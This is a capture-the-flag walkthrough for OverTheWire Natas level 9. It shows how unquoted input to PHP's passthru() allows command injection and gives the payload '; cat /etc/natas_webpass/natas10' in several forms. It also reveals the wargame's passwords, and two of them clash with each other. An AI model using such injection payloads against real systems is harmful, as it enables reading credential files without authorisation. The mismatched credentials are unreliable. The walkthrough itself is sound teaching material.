OverTheWire Natas Level 8 → 9 tutorial!!

Login

URL: http://natas9.natas.labs.overthewire.org
Credentials: natas9:ZE1ck82lmdGIoErlhQgWND6j2Wzz6b6t

# Using curl (optional):
curl -u natas9:ZE1ck82lmdGIoErlhQgWND6j2Wzz6b6t http://natas9.natas.labs.overthewire.org/

Task

The page provides a search box. Viewing the source shows the backend command it runs.

A little bit of Theory

From the source (index-source.html), simplified PHP:

<?php
$key = "";
if (array_key_exists("needle", $_REQUEST)) {
  $key = $_REQUEST["needle"];
}
if ($key != "") {
  passthru("grep -i $key dictionary.txt");
}

• passthru() executes a shell command.
• User input is concatenated straight into the command without quoting.
• That enables command injection: we can terminate the grep and run our own command using ;.

Further reading:

• PHP: passthru
• OWASP: Command Injection

Solution

1. Open the source and confirm the passthru("grep -i $key dictionary.txt"); line.

   

2. Inject a second command to read the next level’s password file.

   Payload for the search box:

   ; cat /etc/natas_webpass/natas10
   

   If you prefer curl, remember to URL-encode or use --data-urlencode:

   curl -u natas9:W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl \
     --data-urlencode 'needle=; cat /etc/natas_webpass/natas10' \
     http://natas9.natas.labs.overthewire.org/
   

3. Read the output: the page prints the file contents under the search results.

   

Password

t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu

Troubleshooting

• Your browser ate the semicolon? → Use --data-urlencode with curl or type %3B instead of ; in the URL.
• Only seeing grep errors? → Ensure there’s a leading ; (it terminates the grep command).
• Still stuck? → Try this full URL form: http://natas9.natas.labs.overthewire.org/?needle=%3B%20cat%20/etc/natas_webpass/natas10

Boom 🎉 You just exploited a classic command injection to steal the next level’s password. On to natas10!

Thanks for reading!

Until next time — Otsumachi!! 💖☄️✨